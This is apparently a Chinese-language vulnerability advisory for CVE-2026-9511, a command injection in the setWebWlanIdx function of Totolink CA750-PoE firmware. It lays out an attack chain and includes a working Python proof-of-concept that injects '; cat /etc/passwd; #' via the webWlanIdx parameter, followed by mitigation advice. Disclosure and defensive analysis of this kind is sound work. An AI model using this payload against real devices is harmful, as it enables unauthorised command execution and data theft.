CVE-2026-9511 Totolink CA750-PoE命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-9511

漏洞类型

OS命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink CA750-PoE

漏洞概述

Totolink CA750-PoE 6.2c.510版本被披露存在操作系统命令注入漏洞。漏洞位于组件Setting Handler的/cgi-bin/cstecgi.cgi文件中的setWebWlanIdx函数。由于该函数对webWlanIdx参数缺乏足够的过滤和校验，攻击者可远程发送特制数据包注入恶意命令。利用此漏洞无需用户交互，攻击者可借此在底层操作系统上执行任意代码，造成敏感信息泄露或系统服务中断。

技术细节

该漏洞具体存在于Totolink CA750-PoE设备的Web管理后台接口中。受影响的具体文件为`/cgi-bin/cstecgi.cgi`，涉及的功能函数为`setWebWlanIdx`。在处理用户请求时，应用程序未能对`webWlanIdx`参数进行有效的边界检查和安全过滤，导致该参数值被直接拼接到系统Shell命令中执行。根据CVSS向量分析，攻击者需要具备低权限账号（PR:L），但可以通过网络（AV:N）发起攻击，且无需诱导用户进行交互（UI:N）。攻击者可通过发送包含管道符、分号等Shell连接符的特制HTTP POST请求，绕过简单的逻辑限制，强制服务器执行注入的任意操作系统命令。由于攻击过程相对简单且已有公开的PoC代码，该漏洞对设备安全性构成严重威胁。

攻击链分析

STEP 1

侦察阶段

攻击者通过网络扫描发现目标设备为Totolink CA750-PoE，并确定其Web管理接口开放。

STEP 2

认证访问

利用低权限账户（PR:L）登录Web管理后台，获取访问/cgi-bin/cstecgi.cgi接口的权限。

STEP 3

漏洞利用

构造恶意HTTP POST请求，向setWebWlanIdx函数的webWlanIdx参数注入Shell元字符（如; | &）。

STEP 4

命令执行

服务器端未过滤该参数，将其直接传递给系统Shell执行，导致攻击者注入的OS命令在设备上运行。

STEP 5

建立控制

根据执行的命令，攻击者可反弹Shell、窃取配置文件或造成拒绝服务，从而控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi"

# HTTP Headers
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Content-Type": "application/json",
    "Accept": "application/json, text/javascript, */*; q=0.01"
}

# Vulnerable Payload data
# The vulnerability is triggered by the 'webWlanIdx' parameter in 'setWebWlanIdx' function
# Payload example: injecting a ping command or simple shell command
payload = {
    "function": "setWebWlanIdx",
    "webWlanIdx": "; cat /etc/passwd; #" 
}

def exploit():
    try:
        # Sending the POST request to the target
        response = requests.post(target_url, json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send request. Status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    exploit()

影响范围

Totolink CA750-PoE 6.2c.510

防御指南

临时缓解措施

如果无法立即升级固件，建议通过防火墙规则阻断外部对设备管理端口（通常是80或443）的访问。此外，应严密监控设备日志中是否存在异常的CGI请求或未知的进程执行记录，并在发现被入侵迹象时立即隔离设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9511
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9511
3 Details https://www.cvedetails.com/cve/CVE-2026-9511/
4 VulDB https://vuldb.com/cve/CVE-2026-9511
5 Link https://github.com/wudipjq/my_vuln/blob/main/totolink4/vuln_49/49.md
6 Link https://vuldb.com/submit/813922
7 Link https://vuldb.com/vuln/365511
8 Link https://vuldb.com/vuln/365511/cti
9 Link https://www.totolink.net/